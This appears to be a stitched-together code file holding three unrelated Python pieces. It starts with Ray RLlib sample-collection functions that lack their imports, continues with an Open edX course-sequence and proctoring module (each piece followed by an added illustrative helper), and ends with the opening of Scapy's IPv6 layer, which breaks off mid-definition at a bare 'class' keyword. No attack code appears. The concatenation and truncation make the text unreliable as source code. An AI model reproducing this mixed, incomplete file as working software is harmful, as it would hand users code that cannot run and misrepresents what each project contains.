from ray.rllib.utils.memory import ray_get_and_free

logger = logging.getLogger(__name__)


def collect_samples(agents, sample_batch_size, num_envs_per_worker,
                    train_batch_size):
    """Collects at least train_batch_size samples, never discarding any."""

    num_timesteps_so_far = 0
    trajectories = []
    agent_dict = {}

    for agent in agents:
        fut_sample = agent.sample.remote()
        agent_dict[fut_sample] = agent

    while agent_dict:
        [fut_sample], _ = ray.wait(list(agent_dict))
        agent = agent_dict.pop(fut_sample)
        next_sample = ray_get_and_free(fut_sample)
        assert next_sample.count >= sample_batch_size * num_envs_per_worker
        num_timesteps_so_far += next_sample.count
        trajectories.append(next_sample)

        # Only launch more tasks if we don't already have enough pending
        pending = len(agent_dict) * sample_batch_size * num_envs_per_worker
        if num_timesteps_so_far + pending < train_batch_size:
            fut_sample2 = agent.sample.remote()
            agent_dict[fut_sample2] = agent

    return SampleBatch.concat_samples(trajectories)


def collect_samples_straggler_mitigation(agents, train_batch_size):
    """Collects at least train_batch_size samples.

    This is the legacy behavior as of 0.6, and launches extra sample tasks
    to potentially improve performance but can result in many wasted samples.
    """

    num_timesteps_so_far = 0
    trajectories = []
    agent_dict = {}

    for agent in agents:
        fut_sample = agent.sample.remote()
        agent_dict[fut_sample] = agent

    while num_timesteps_so_far < train_batch_size:
        # TODO(pcm): Make wait support arbitrary iterators and remove the
        # conversion to list here.
        [fut_sample], _ = ray.wait(list(agent_dict))
        agent = agent_dict.pop(fut_sample)
        # Start task with next trajectory and record it in the dictionary.
        fut_sample2 = agent.sample.remote()
        agent_dict[fut_sample2] = agent

        next_sample = ray_get_and_free(fut_sample)
        num_timesteps_so_far += next_sample.count
        trajectories.append(next_sample)

    logger.info("Discarding {} sample tasks".format(len(agent_dict)))
    return SampleBatch.concat_samples(trajectories)
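# Illustrative arithmetic (not part of the original module) for the
# "enough pending" check in collect_samples(): with hypothetical values
# sample_batch_size=50, num_envs_per_worker=2 and train_batch_size=500,
# every outstanding task is guaranteed to return at least 50 * 2 = 100
# timesteps, so 3 pending tasks already account for 300.  A new task is
# launched only while collected + pending < train_batch_size.
def _should_launch_more(num_collected, num_pending_tasks,
                        sample_batch_size=50, num_envs_per_worker=2,
                        train_batch_size=500):
    pending = num_pending_tasks * sample_batch_size * num_envs_per_worker
    return num_collected + pending < train_batch_size

assert _should_launch_more(num_collected=150, num_pending_tasks=3)       # 150 + 300 < 500
assert not _should_launch_more(num_collected=250, num_pending_tasks=3)   # 250 + 300 >= 500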
""" xModule implementation of a learning sequence """ # pylint: disable=abstract-method import collections import json import logging from datetime import datetime from functools import reduce import six from django.contrib.auth import get_user_model from lxml import etree from opaque_keys.edx.keys import UsageKey from pkg_resources import resource_string from pytz import UTC from six import text_type from web_fragments.fragment import Fragment from xblock.completable import XBlockCompletionMode from xblock.core import XBlock from xblock.exceptions import NoSuchServiceError from xblock.fields import Boolean, Integer, List, Scope, String from edx_toggles.toggles import LegacyWaffleFlag from edx_toggles.toggles import WaffleFlag # lint-amnesty, pylint: disable=unused-import from lms.djangoapps.courseware.toggles import COURSEWARE_PROCTORING_IMPROVEMENTS from .exceptions import NotFoundError from .fields import Date from .mako_module import MakoModuleDescriptor from .progress import Progress from .x_module import AUTHOR_VIEW, PUBLIC_VIEW, STUDENT_VIEW, XModule from .xml_module import XmlDescriptor log = logging.getLogger(__name__) try: import newrelic.agent except ImportError: newrelic = None # pylint: disable=invalid-name # HACK: This shouldn't be hard-coded to two types # OBSOLETE: This obsoletes 'type' class_priority = ['video', 'problem'] # Make '_' a no-op so we can scrape strings. Using lambda instead of # `django.utils.translation.ugettext_noop` because Django cannot be imported in this file _ = lambda text: text TIMED_EXAM_GATING_WAFFLE_FLAG = LegacyWaffleFlag( waffle_namespace="xmodule", flag_name=u'rev_1377_rollout', module_name=__name__, ) class SequenceFields(object): # lint-amnesty, pylint: disable=missing-class-docstring has_children = True completion_mode = XBlockCompletionMode.AGGREGATOR # NOTE: Position is 1-indexed. This is silly, but there are now student # positions saved on prod, so it's not easy to fix. position = Integer(help="Last tab viewed in this sequence", scope=Scope.user_state) due = Date( display_name=_("Due Date"), help=_("Enter the date by which problems are due."), scope=Scope.settings, ) hide_after_due = Boolean( display_name=_("Hide sequence content After Due Date"), help=_( "If set, the sequence content is hidden for non-staff users after the due date has passed." ), default=False, scope=Scope.settings, ) is_entrance_exam = Boolean( display_name=_("Is Entrance Exam"), help=_( "Tag this course module as an Entrance Exam. " "Note, you must enable Entrance Exams for this course setting to take effect." ), default=False, scope=Scope.settings, ) class ProctoringFields(object): """ Fields that are specific to Proctored or Timed Exams """ is_time_limited = Boolean( display_name=_("Is Time Limited"), help=_( "This setting indicates whether students have a limited time" " to view or interact with this courseware component." ), default=False, scope=Scope.settings, ) default_time_limit_minutes = Integer( display_name=_("Time Limit in Minutes"), help=_( "The number of minutes available to students for viewing or interacting with this courseware component." ), default=None, scope=Scope.settings, ) is_proctored_enabled = Boolean( display_name=_("Is Proctoring Enabled"), help=_( "This setting indicates whether this exam is a proctored exam." ), default=False, scope=Scope.settings, ) exam_review_rules = String( display_name=_("Software Secure Review Rules"), help=_( "This setting indicates what rules the proctoring team should follow when viewing the videos." 
), default='', scope=Scope.settings, ) is_practice_exam = Boolean( display_name=_("Is Practice Exam"), help=_( "This setting indicates whether this exam is for testing purposes only. Practice exams are not verified." ), default=False, scope=Scope.settings, ) is_onboarding_exam = Boolean( display_name=_("Is Onboarding Exam"), help=_( "This setting indicates whether this exam is an onboarding exam." ), default=False, scope=Scope.settings, ) def _get_course(self): """ Return course by course id. """ return self.descriptor.runtime.modulestore.get_course(self.course_id) # pylint: disable=no-member @property def is_timed_exam(self): """ Alias the permutation of above fields that corresponds to un-proctored timed exams to the more clearly-named is_timed_exam """ return not self.is_proctored_enabled and not self.is_practice_exam and self.is_time_limited @property def is_proctored_exam(self): """ Alias the is_proctored_enabled field to the more legible is_proctored_exam """ return self.is_proctored_enabled @property def allow_proctoring_opt_out(self): """ Returns true if the learner should be given the option to choose between taking a proctored exam, or opting out to take the exam without proctoring. """ return self._get_course().allow_proctoring_opt_out @is_proctored_exam.setter def is_proctored_exam(self, value): """ Alias the is_proctored_enabled field to the more legible is_proctored_exam """ self.is_proctored_enabled = value @XBlock.wants('proctoring') @XBlock.wants('verification') @XBlock.wants('gating') @XBlock.wants('credit') @XBlock.wants('completion') @XBlock.needs('user') @XBlock.needs('bookmarks') @XBlock.needs('i18n') @XBlock.wants('content_type_gating') class SequenceModule(SequenceFields, ProctoringFields, XModule): """ Layout module which lays out content in a temporal sequence """ js = { 'js': [resource_string(__name__, 'js/src/sequence/display.js')], } css = { 'scss': [resource_string(__name__, 'css/sequence/display.scss')], } js_module_name = "Sequence" def __init__(self, *args, **kwargs): super(SequenceModule, self).__init__(*args, **kwargs) # lint-amnesty, pylint: disable=super-with-arguments self.gated_sequence_paywall = None # If position is specified in system, then use that instead. position = getattr(self.system, 'position', None) if position is not None: assert isinstance(position, int) self.position = self.system.position def get_progress(self): ''' Return the total progress, adding total done and total available. (assumes that each submodule uses the same "units" for progress.) ''' # TODO: Cache progress or children array? 
children = self.get_children() progresses = [child.get_progress() for child in children] progress = reduce(Progress.add_counts, progresses, None) return progress def handle_ajax(self, dispatch, data, view=STUDENT_VIEW): # TODO: bounds checking # lint-amnesty, pylint: disable=arguments-differ ''' get = request.POST instance ''' if dispatch == 'goto_position': # set position to default value if either 'position' argument not # found in request or it is a non-positive integer position = data.get('position', u'1') if position.isdigit() and int(position) > 0: self.position = int(position) else: self.position = 1 return json.dumps({'success': True}) if dispatch == 'get_completion': completion_service = self.runtime.service(self, 'completion') usage_key = data.get('usage_key', None) if not usage_key: return None item = self.get_child(UsageKey.from_string(usage_key)) if not item: return None complete = completion_service.vertical_is_complete(item) return json.dumps({ 'complete': complete }) elif dispatch == 'metadata': context = {'exclude_units': True} prereq_met = True prereq_meta_info = {} banner_text = None display_items = self.get_display_items() if self._required_prereq(): if self.runtime.user_is_staff: banner_text = _('This subsection is unlocked for learners when they meet the prerequisite requirements.') # lint-amnesty, pylint: disable=line-too-long else: # check if prerequisite has been met prereq_met, prereq_meta_info = self._compute_is_prereq_met(True) meta = self._get_render_metadata(context, display_items, prereq_met, prereq_meta_info, banner_text, view) meta['display_name'] = self.display_name_with_default meta['format'] = getattr(self, 'format', '') return json.dumps(meta) raise NotFoundError('Unexpected dispatch type') @classmethod def verify_current_content_visibility(cls, date, hide_after_date): """ Returns whether the content visibility policy passes for the given date and hide_after_date values and the current date-time. """ return ( not date or not hide_after_date or datetime.now(UTC) < date ) def gate_entire_sequence_if_it_is_a_timed_exam_and_contains_content_type_gated_problems(self): """ Problem: Content type gating for FBE (Feature Based Enrollments) previously only gated individual blocks. This was an issue because audit learners could start a timed exam and then be unable to complete it because the graded content would be gated. Even if they later upgraded, they could still be unable to complete the exam because the timer could have expired. Solution: Gate the entire sequence when we think the above problem can occur. If: 1. This sequence is a timed exam (this is currently being checked before calling) 2. And this sequence contains problems which this user cannot load due to content type gating Then: We will gate access to the entire sequence. Otherwise, learners would have the ability to start their timer for an exam, but then not have the ability to complete it. We are displaying the gating fragment within the sequence, as is done for gating for prereqs, rather than content type gating the entire sequence because that would remove the next/previous navigation. When gated_sequence_paywall is not set to None, the sequence will be gated. 
This functionality still needs to be replicated in the frontend-app-learning courseware MFE The ticket to track this is https://openedx.atlassian.net/browse/REV-1220 Note that this will break compatability with using sequences outside of edx-platform but we are ok with this for now """ content_type_gating_service = self.runtime.service(self, 'content_type_gating') if content_type_gating_service: self.gated_sequence_paywall = content_type_gating_service.check_children_for_content_type_gating_paywall( self, self.course_id ) def student_view(self, context): _ = self.runtime.service(self, "i18n").ugettext context = context or {} self._capture_basic_metrics() banner_text = None prereq_met = True prereq_meta_info = {} if self._required_prereq(): if self.runtime.user_is_staff: banner_text = _('This subsection is unlocked for learners when they meet the prerequisite requirements.') # lint-amnesty, pylint: disable=line-too-long else: # check if prerequisite has been met prereq_met, prereq_meta_info = self._compute_is_prereq_met(True) if prereq_met: special_html_view = self._hidden_content_student_view(context) or self._special_exam_student_view() if special_html_view: masquerading_as_specific_student = context.get('specific_masquerade', False) banner_text, special_html = special_html_view if special_html and not masquerading_as_specific_student: return Fragment(special_html) return self._student_or_public_view(context, prereq_met, prereq_meta_info, banner_text) def public_view(self, context): """ Renders the preview view of the block in the LMS. """ prereq_met = True prereq_meta_info = {} if self._required_prereq(): prereq_met, prereq_meta_info = self._compute_is_prereq_met(True) return self._student_or_public_view(context or {}, prereq_met, prereq_meta_info, None, PUBLIC_VIEW) def author_view(self, context): # lint-amnesty, pylint: disable=missing-function-docstring context = context or {} context['exclude_units'] = True if 'position' in context: context['position'] = int(context['position']) return self._student_or_public_view(context, True, {}, view=AUTHOR_VIEW) def _special_exam_student_view(self): """ Checks whether this sequential is a special exam. If so, returns a banner_text or the fragment to display depending on whether staff is masquerading. """ _ = self.runtime.service(self, "i18n").ugettext if self.is_time_limited: if TIMED_EXAM_GATING_WAFFLE_FLAG.is_enabled(): # set the self.gated_sequence_paywall variable self.gate_entire_sequence_if_it_is_a_timed_exam_and_contains_content_type_gated_problems() if self.gated_sequence_paywall is None: special_exam_html = self._time_limited_student_view() if special_exam_html: banner_text = _("This exam is hidden from the learner.") return banner_text, special_exam_html def _hidden_content_student_view(self, context): """ Checks whether the content of this sequential is hidden from the runtime user. If so, returns a banner_text or the fragment to display depending on whether staff is masquerading. 
""" _ = self.runtime.service(self, "i18n").ugettext course = self._get_course() if not self._can_user_view_content(course): if course.self_paced: banner_text = _("Because the course has ended, this assignment is hidden from the learner.") else: banner_text = _("Because the due date has passed, this assignment is hidden from the learner.") hidden_content_html = self.system.render_template( 'hidden_content.html', { 'self_paced': course.self_paced, 'progress_url': context.get('progress_url'), } ) return banner_text, hidden_content_html def _can_user_view_content(self, course): """ Returns whether the runtime user can view the content of this sequential. """ hidden_date = course.end if course.self_paced else self.due return ( self.runtime.user_is_staff or self.verify_current_content_visibility(hidden_date, self.hide_after_due) ) def is_user_authenticated(self, context): # NOTE (CCB): We default to true to maintain the behavior in place prior to allowing anonymous access access. return context.get('user_authenticated', True) def _get_render_metadata(self, context, display_items, prereq_met, prereq_meta_info, banner_text=None, view=STUDENT_VIEW, fragment=None): # lint-amnesty, pylint: disable=line-too-long, missing-function-docstring if prereq_met and not self._is_gate_fulfilled(): banner_text = _( 'This section is a prerequisite. You must complete this section in order to unlock additional content.' ) items = self._render_student_view_for_items(context, display_items, fragment, view) if prereq_met else [] params = { 'items': items, 'element_id': self.location.html_id(), 'item_id': text_type(self.location), 'is_time_limited': self.is_time_limited, 'position': self.position, 'tag': self.location.block_type, 'ajax_url': self.system.ajax_url, 'next_url': context.get('next_url'), 'prev_url': context.get('prev_url'), 'banner_text': banner_text, 'save_position': view != PUBLIC_VIEW, 'show_completion': view != PUBLIC_VIEW, 'gated_content': self._get_gated_content_info(prereq_met, prereq_meta_info), 'sequence_name': self.display_name, 'exclude_units': context.get('exclude_units', False), 'gated_sequence_paywall': self.gated_sequence_paywall } return params def _student_or_public_view(self, context, prereq_met, prereq_meta_info, banner_text=None, view=STUDENT_VIEW): """ Returns the rendered student view of the content of this sequential. If banner_text is given, it is added to the content. 
""" _ = self.runtime.service(self, "i18n").ugettext display_items = self.get_display_items() self._update_position(context, len(display_items)) fragment = Fragment() params = self._get_render_metadata(context, display_items, prereq_met, prereq_meta_info, banner_text, view, fragment) # lint-amnesty, pylint: disable=line-too-long fragment.add_content(self.system.render_template("seq_module.html", params)) self._capture_full_seq_item_metrics(display_items) self._capture_current_unit_metrics(display_items) return fragment def _get_gated_content_info(self, prereq_met, prereq_meta_info): """ Returns a dict of information about gated_content context """ gated_content = { 'prereq_id': None, 'prereq_url': None, 'prereq_section_name': None, 'gated': False, 'gated_section_name': self.display_name, } if not prereq_met: gated_content['gated'] = True gated_content['prereq_url'] = prereq_meta_info['url'] gated_content['prereq_section_name'] = prereq_meta_info['display_name'] gated_content['prereq_id'] = prereq_meta_info['id'] return gated_content def _is_gate_fulfilled(self): """ Determines if this section is a prereq and has any unfulfilled milestones. Returns: True if section has no unfufilled milestones or is not a prerequisite. False otherwise """ gating_service = self.runtime.service(self, 'gating') if gating_service: fulfilled = gating_service.is_gate_fulfilled( self.course_id, self.location, self.runtime.user_id ) return fulfilled return True def _required_prereq(self): """ Checks whether a prerequisite is required for this Section Returns: milestone if a prereq is required, None otherwise """ gating_service = self.runtime.service(self, 'gating') if gating_service: milestone = gating_service.required_prereq( self.course_id, self.location, 'requires' ) return milestone return None def descendants_are_gated(self): """ Sequences do their own access gating logic as to whether their content should be viewable, based on things like pre-reqs and time exam starts. Ideally, this information would be passed down to all descendants so that they would know if it's safe to render themselves, but the least invasive patch to this is to make a method that rendering Django views can use to verify before rendering descendants. This does _NOT_ check for the content types of children because the performing that traversal undoes a lot of the performance gains made in large sequences when hitting the render_xblock endpoint directly. This method is here mostly to help render_xblock figure out if it's okay to render a descendant of a sequence to guard against malicious actors. So the "let's check all descendants to not let people start an exam they can't finish" reasoning of doing the full traversal does not apply. Returns: True if this sequence and its descendants are gated by what are currently sequence-level checks. False if the sequence is and its decendants are not gated. Note that this gating logic is only a part of the equation when it comes to determining whether a student is allowed to access this, with other checks being done in has_access calls. """ if self.runtime.user_is_staff: return False # We're not allowed to see it because of pre-reqs that haven't been # fullfilled. if self._required_prereq(): prereq_met, _prereq_meta_info = self._compute_is_prereq_met(True) if not prereq_met: return True # Are we a time limited test that hasn't started yet? if self.is_time_limited: if self._time_limited_student_view() or self._hidden_content_student_view({}): return True # Otherwise, nothing is blocking us. 
return False def _compute_is_prereq_met(self, recalc_on_unmet): """ Evaluate if the user has completed the prerequisite Arguments: recalc_on_unmet: Recalculate the subsection grade if prereq has not yet been met Returns: tuple: True|False, prereq_meta_info = { 'url': prereq_url, 'display_name': prereq_name} """ gating_service = self.runtime.service(self, 'gating') if gating_service: return gating_service.compute_is_prereq_met(self.location, self.runtime.user_id, recalc_on_unmet) return True, {} def _update_position(self, context, number_of_display_items): """ Update the user's sequential position given the context and the number_of_display_items """ position = context.get('position') if position: self.position = position # If we're rendering this sequence, but no position is set yet, # or exceeds the length of the displayable items, # default the position to the first element if context.get('requested_child') == 'first': self.position = 1 elif context.get('requested_child') == 'last': self.position = number_of_display_items or 1 elif self.position is None or self.position > number_of_display_items: self.position = 1 def _render_student_view_for_items(self, context, display_items, fragment, view=STUDENT_VIEW): """ Updates the given fragment with rendered student views of the given display_items. Returns a list of dict objects with information about the given display_items. """ render_items = not context.get('exclude_units', False) is_user_authenticated = self.is_user_authenticated(context) completion_service = self.runtime.service(self, 'completion') try: bookmarks_service = self.runtime.service(self, 'bookmarks') except NoSuchServiceError: bookmarks_service = None user = self.runtime.service(self, 'user').get_current_user() context['username'] = user.opt_attrs.get( 'edx-platform.username') display_names = [ self.get_parent().display_name_with_default, self.display_name_with_default ] contents = [] for item in display_items: # NOTE (CCB): This seems like a hack, but I don't see a better method of determining the type/category. 
item_type = item.get_icon_class() usage_id = item.scope_ids.usage_id show_bookmark_button = False is_bookmarked = False if is_user_authenticated and bookmarks_service: show_bookmark_button = True is_bookmarked = bookmarks_service.is_bookmarked(usage_key=usage_id) context['show_bookmark_button'] = show_bookmark_button context['bookmarked'] = is_bookmarked context['format'] = getattr(self, 'format', '') if render_items: rendered_item = item.render(view, context) fragment.add_fragment_resources(rendered_item) content = rendered_item.content else: content = '' content_type_gating_service = self.runtime.service(self, 'content_type_gating') contains_content_type_gated_content = False if content_type_gating_service: contains_content_type_gated_content = content_type_gating_service.check_children_for_content_type_gating_paywall( # pylint:disable=line-too-long item, self.course_id ) is not None iteminfo = { 'content': content, 'page_title': getattr(item, 'tooltip_title', ''), 'type': item_type, 'id': text_type(usage_id), 'bookmarked': is_bookmarked, 'path': " > ".join(display_names + [item.display_name_with_default]), 'graded': item.graded, 'contains_content_type_gated_content': contains_content_type_gated_content, } if not render_items: # The item url format can be defined in the template context like so: # context['item_url'] = '/my/item/path/{usage_key}/whatever' iteminfo['href'] = context.get('item_url', '').format(usage_key=usage_id) if is_user_authenticated: if item.location.block_type == 'vertical' and completion_service: iteminfo['complete'] = completion_service.vertical_is_complete(item) contents.append(iteminfo) return contents def _locations_in_subtree(self, node): """ The usage keys for all descendants of an XBlock/XModule as a flat list. Includes the location of the node passed in. """ stack = [node] locations = [] while stack: curr = stack.pop() locations.append(curr.location) if curr.has_children: stack.extend(curr.get_children()) return locations def _capture_basic_metrics(self): """ Capture basic information about this sequence in New Relic. """ if not newrelic: return newrelic.agent.add_custom_parameter('seq.block_id', six.text_type(self.location)) newrelic.agent.add_custom_parameter('seq.display_name', self.display_name or '') newrelic.agent.add_custom_parameter('seq.position', self.position) newrelic.agent.add_custom_parameter('seq.is_time_limited', self.is_time_limited) def _capture_full_seq_item_metrics(self, display_items): """ Capture information about the number and types of XBlock content in the sequence as a whole. We send this information to New Relic so that we can do better performance analysis of courseware. """ if not newrelic: return # Basic count of the number of Units (a.k.a. VerticalBlocks) we have in # this learning sequence newrelic.agent.add_custom_parameter('seq.num_units', len(display_items)) # Count of all modules (leaf nodes) in this sequence (e.g. videos, # problems, etc.) The units (verticals) themselves are not counted. all_item_keys = self._locations_in_subtree(self) newrelic.agent.add_custom_parameter('seq.num_items', len(all_item_keys)) # Count of all modules by block_type (e.g. 
"video": 2, "discussion": 4) block_counts = collections.Counter(usage_key.block_type for usage_key in all_item_keys) for block_type, count in block_counts.items(): newrelic.agent.add_custom_parameter('seq.block_counts.{}'.format(block_type), count) def _capture_current_unit_metrics(self, display_items): """ Capture information about the current selected Unit within the Sequence. """ if not newrelic: return # Positions are stored with indexing starting at 1. If we get into a # weird state where the saved position is out of bounds (e.g. the # content was changed), avoid going into any details about this unit. if 1 <= self.position <= len(display_items): # Basic info about the Unit... current = display_items[self.position - 1] newrelic.agent.add_custom_parameter('seq.current.block_id', six.text_type(current.location)) newrelic.agent.add_custom_parameter('seq.current.display_name', current.display_name or '') # Examining all items inside the Unit (or split_test, conditional, etc.) child_locs = self._locations_in_subtree(current) newrelic.agent.add_custom_parameter('seq.current.num_items', len(child_locs)) curr_block_counts = collections.Counter(usage_key.block_type for usage_key in child_locs) for block_type, count in curr_block_counts.items(): newrelic.agent.add_custom_parameter('seq.current.block_counts.{}'.format(block_type), count) def _time_limited_student_view(self): """ Delegated rendering of a student view when in a time limited view. This ultimately calls down into edx_proctoring pip installed djangoapp """ # None = no overridden view rendering view_html = None proctoring_service = self.runtime.service(self, 'proctoring') credit_service = self.runtime.service(self, 'credit') verification_service = self.runtime.service(self, 'verification') # Is this sequence designated as a Timed Examination, which includes # Proctored Exams feature_enabled = ( proctoring_service and credit_service and self.is_time_limited ) if feature_enabled: user_id = self.runtime.user_id user_role_in_course = 'staff' if self.runtime.user_is_staff else 'student' course_id = self.runtime.course_id content_id = self.location context = { 'display_name': self.display_name, 'default_time_limit_mins': ( self.default_time_limit_minutes if self.default_time_limit_minutes else 0 ), 'is_practice_exam': self.is_practice_exam, 'allow_proctoring_opt_out': self.allow_proctoring_opt_out, 'due_date': self.due, 'grace_period': self.graceperiod, # lint-amnesty, pylint: disable=no-member 'experimental_proctoring_features': COURSEWARE_PROCTORING_IMPROVEMENTS.is_enabled(course_id), } # inject the user's credit requirements and fulfillments if credit_service: credit_state = credit_service.get_credit_state(user_id, course_id) if credit_state: context.update({ 'credit_state': credit_state }) # inject verification status if verification_service: verification_status = verification_service.get_status(user_id) context.update({ 'verification_status': verification_status['status'], 'reverify_url': verification_service.reverify_url(), }) # See if the edx-proctoring subsystem wants to present # a special view to the student rather # than the actual sequence content # # This will return None if there is no # overridden view to display given the # current state of the user view_html = proctoring_service.get_student_view( user_id=user_id, course_id=course_id, content_id=content_id, context=context, user_role=user_role_in_course ) return view_html def get_icon_class(self): child_classes = set(child.get_icon_class() for child in self.get_children()) 
new_class = 'other' for c in class_priority: if c in child_classes: new_class = c return new_class class SequenceMixin(SequenceFields): """ A mixin of shared code between the SequenceDescriptor and XBlocks converted from XModules which inherited from SequenceDescriptor. """ @classmethod def definition_from_xml(cls, xml_object, system): # lint-amnesty, pylint: disable=missing-function-docstring children = [] for child in xml_object: try: child_block = system.process_xml(etree.tostring(child, encoding='unicode')) children.append(child_block.scope_ids.usage_id) except Exception as e: # lint-amnesty, pylint: disable=broad-except log.exception("Unable to load child when parsing Sequence. Continuing...") if system.error_tracker is not None: system.error_tracker(u"ERROR: {0}".format(e)) continue return {}, children def index_dictionary(self): """ Return dictionary prepared with module content and type for indexing. """ # return key/value fields in a Python dict object # values may be numeric / string or dict # default implementation is an empty dict xblock_body = super(SequenceMixin, self).index_dictionary() # lint-amnesty, pylint: disable=super-with-arguments html_body = { "display_name": self.display_name, } if "content" in xblock_body: xblock_body["content"].update(html_body) else: xblock_body["content"] = html_body xblock_body["content_type"] = "Sequence" return xblock_body class SequenceDescriptor(SequenceMixin, ProctoringFields, MakoModuleDescriptor, XmlDescriptor): """ A Sequence's Descriptor object """ mako_template = 'widgets/sequence-edit.html' module_class = SequenceModule resources_dir = None has_author_view = True show_in_read_only_mode = True js = { 'js': [resource_string(__name__, 'js/src/sequence/edit.js')], } js_module_name = "SequenceDescriptor" def definition_to_xml(self, resource_fs): xml_object = etree.Element('sequential') for child in self.get_children(): self.runtime.add_block_as_child_node(child, xml_object) return xml_object @property def non_editable_metadata_fields(self): """ `is_entrance_exam` should not be editable in the Studio settings editor. """ non_editable_fields = super(SequenceDescriptor, self).non_editable_metadata_fields # lint-amnesty, pylint: disable=super-with-arguments non_editable_fields.append(self.fields['is_entrance_exam']) # pylint:disable=unsubscriptable-object return non_editable_fields class HighlightsFields(object): """Only Sections have summaries now, but we may expand that later.""" highlights = List( help=_("A list summarizing what students should look forward to in this section."), scope=Scope.settings ) class SectionModule(HighlightsFields, SequenceModule): """Module for a Section/Chapter.""" class SectionDescriptor(HighlightsFields, SequenceDescriptor): """Descriptor for a Section/Chapter.""" module_class = SectionModule
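# Illustrative helper (not part of the original module) mirroring the
# position normalization done by SequenceModule.handle_ajax for the
# 'goto_position' dispatch above: positions arrive as strings, are
# 1-indexed, and anything non-numeric or non-positive falls back to 1.
def _normalize_position(raw_position):
    return int(raw_position) if raw_position.isdigit() and int(raw_position) > 0 else 1

assert _normalize_position(u'3') == 3
assert _normalize_position(u'-2') == 1
assert _normalize_position(u'abc') == 1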
#! /usr/bin/env python ############################################################################# ## ## ## inet6.py --- IPv6 support for Scapy ## ## see http://natisbad.org/IPv6/ ## ## for more informations ## ## ## ## Copyright (C) 2005 Guillaume Valadon <[email protected]> ## ## Arnaud Ebalard <[email protected]> ## ## ## ## This program is free software; you can redistribute it and/or modify it ## ## under the terms of the GNU General Public License version 2 as ## ## published by the Free Software Foundation. ## ## ## ## This program is distributed in the hope that it will be useful, but ## ## WITHOUT ANY WARRANTY; without even the implied warranty of ## ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## ## General Public License for more details. ## ## ## ############################################################################# """ IPv6 (Internet Protocol v6). """ import socket if not socket.has_ipv6: raise socket.error("can't use AF_INET6, IPv6 is disabled") if not hasattr(socket, "IPPROTO_IPV6"): # Workaround for http://bugs.python.org/issue6926 socket.IPPROTO_IPV6 = 41 if not hasattr(socket, "IPPROTO_IPIP"): # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 socket.IPPROTO_IPIP = 4 from scapy.config import conf from scapy.layers.l2 import * from scapy.layers.inet import * from scapy.fields import * from scapy.packet import * from scapy.volatile import * from scapy.sendrecv import sr,sr1,srp1 from scapy.as_resolvers import AS_resolver_riswhois from scapy.supersocket import SuperSocket,L3RawSocket from scapy.arch import * from scapy.utils6 import * ############################################################################# # Helpers ## ############################################################################# def get_cls(name, fallback_cls): return globals().get(name, fallback_cls) ########################## ## Neighbor cache stuff ## ########################## conf.netcache.new_cache("in6_neighbor", 120) def neighsol(addr, src, iface, timeout=1, chainCC=0): """ Sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address addr. 'src' address is used as source of the message. Message is sent on iface. By default, timeout waiting for an answer is 1 second. If no answer is gathered, None is returned. Else, the answer is returned (ethernet frame). """ nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) d = inet_ntop(socket.AF_INET6, nsma) dm = in6_getnsmac(nsma) p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255) p /= ICMPv6ND_NS(tgt=addr) p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)) res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, chainCC=chainCC) return res def getmacbyip6(ip6, chainCC=0): """ Returns the mac address to be used for provided 'ip6' peer. neighborCache.get() method is used on instantiated neighbor cache. Resolution mechanism is described in associated doc string. 
(chainCC parameter value ends up being passed to sending function used to perform the resolution, if needed) """ if in6_ismaddr(ip6): # Multicast mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) return mac iff,a,nh = conf.route6.route(ip6, dev=conf.iface6) if iff == LOOPBACK_NAME: return "ff:ff:ff:ff:ff:ff" if nh != '::': ip6 = nh # Found next hop mac = conf.netcache.in6_neighbor.get(ip6) if mac: return mac res = neighsol(ip6, a, iff, chainCC=chainCC) if res is not None: if ICMPv6NDOptDstLLAddr in res: mac = res[ICMPv6NDOptDstLLAddr].lladdr else: mac = res.src conf.netcache.in6_neighbor[ip6] = mac return mac return None ############################################################################# ############################################################################# ### IPv6 addresses manipulation routines ### ############################################################################# ############################################################################# class Net6(Gen): # syntax ex. fec0::/126 """Generate a list of IPv6s from a network address or a name""" name = "ipv6" ipaddress = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$") def __init__(self, net): self.repr = net tmp = net.split('/')+["128"] if not self.ipaddress.match(net): tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0] netmask = int(tmp[1]) self.net = inet_pton(socket.AF_INET6, tmp[0]) self.mask = in6_cidr2mask(netmask) self.plen = netmask def __iter__(self): def m8(i): if i % 8 == 0: return i tuple = filter(lambda x: m8(x), xrange(8, 129)) a = in6_and(self.net, self.mask) tmp = map(lambda x: x, struct.unpack('16B', a)) def parse_digit(a, netmask): netmask = min(8,max(netmask,0)) a = (int(a) & (0xffL<<netmask),(int(a) | (0xffL>>(8-netmask)))+1) return a self.parsed = map(lambda x,y: parse_digit(x,y), tmp, map(lambda x,nm=self.plen: x-nm, tuple)) def rec(n, l): if n and n % 2 == 0: sep = ':' else: sep = '' if n == 16: return l else: ll = [] for i in xrange(*self.parsed[n]): for y in l: ll += [y+sep+'%.2x'%i] return rec(n+1, ll) return iter(rec(0, [''])) def __repr__(self): return "Net6(%r)" % self.repr ############################################################################# ############################################################################# ### IPv6 Class ### ############################################################################# ############################################################################# class IP6Field(Field): def __init__(self, name, default): Field.__init__(self, name, default, "16s") def h2i(self, pkt, x): if type(x) is str: try: x = in6_ptop(x) except socket.error: x = Net6(x) elif type(x) is list: x = map(Net6, x) return x def i2m(self, pkt, x): return inet_pton(socket.AF_INET6, x) def m2i(self, pkt, x): return inet_ntop(socket.AF_INET6, x) def any2i(self, pkt, x): return self.h2i(pkt,x) def i2repr(self, pkt, x): if x is None: return self.i2h(pkt,x) elif not isinstance(x, Net6) and not type(x) is list: if in6_isaddrTeredo(x): # print Teredo info server, flag, maddr, mport = teredoAddrExtractInfo(x) return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport) elif in6_isaddr6to4(x): # print encapsulated address vaddr = in6_6to4ExtractAddr(x) return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr) return self.i2h(pkt, x) # No specific information to return def randval(self): return RandIP6() class 